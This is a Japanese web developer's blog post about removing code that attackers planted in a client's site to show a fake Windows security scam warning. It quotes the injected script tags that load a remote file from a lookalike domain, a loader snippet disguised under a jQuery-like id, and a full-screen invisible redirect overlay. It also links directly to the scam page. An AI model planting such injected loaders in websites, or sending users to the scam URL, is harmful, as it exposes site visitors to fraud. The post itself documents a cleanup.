web関連

webサイトで「Windowsセキュリティシステムが破損しています」って警告でたので修正してみた

webサイトで「Windowsセキュリティシステムが破損しています」って警告でたので修正してみた

詐欺警告みたいっすね
お客さんのサイトのトップとJsファイルになんかコード仕込まれてたので修正した時の備忘録

最初に

ソースを実際に直すのが目的の記事なので、警告についての詳しい情報については下記を参考にしてください。

▼お使いのセキュリティシステム破損!? 偽警告の消し方2つと迷惑ソフト対策
https://blogs.yahoo.co.jp/fireflyframer/34407779.html

▼Windows 詐欺警告「Windowsセキュリティシステムが破損しています」が出てしまった時の対処方法
http://tanweb.net/2017/12/22/17417/

以下より実際に改ざんされて埋め込まれてたコードを削除していきます。

ブラウザ上のサイトに表示されるコード

<div id="div490924" style="width: 100%; height: 100%; position: fixed; left: 0px; top: 0px; z-index: 99999999;">
<a href="http://cdnjp.googlestatisticalserver.com/redirect?u=https%3A%2F%2Fafilter.xyz%2Fc%2F899%2F0%3F" target="_blank" style="display: block;width:100%; height: 100%; cursor: default"></a>
</div>
このコードが以降に記述するjavascriptで読み込まれてサイトの縦横いっぱいに詐欺警告ページへのリンク貼っつけてた

ファイルを改ざんされて埋め込まれていたコード

index.htmlファイル

<script type="text/javascript" charset="utf-8" src='//cdnjp.googlestatisticalserver.com/core.min.js' ></script>
最下部のbodyの閉じタグの前に入ってた

jsファイル

(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//cdnjp.googlestatisticalserver.com/core.min.js";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'jquery-ui-sdk'));
上記「index.html」と「jsファイル」のソースコード消したら詐欺警告ページへのリンクが出なくなった

まとめ

恐らくフォーム経由で改ざんされたと思う
かなり昔のフォームで、昔フォームから改ざんが流行ってたみたいだし

しかも一度アクセスするとしばらくは詐欺警告ページのリンクでないから確認めんどくさかった
お客さんもたまたまかなって危機感感じないかもね

実際の詐欺警告ページのリンク貼っておくのでよければ確認してください

https://afilter.xyz/c/899/0

macはなぜかAmazonに飛ばされた
Windowsだけみたいね

お客さんにフォームの修正提案せねば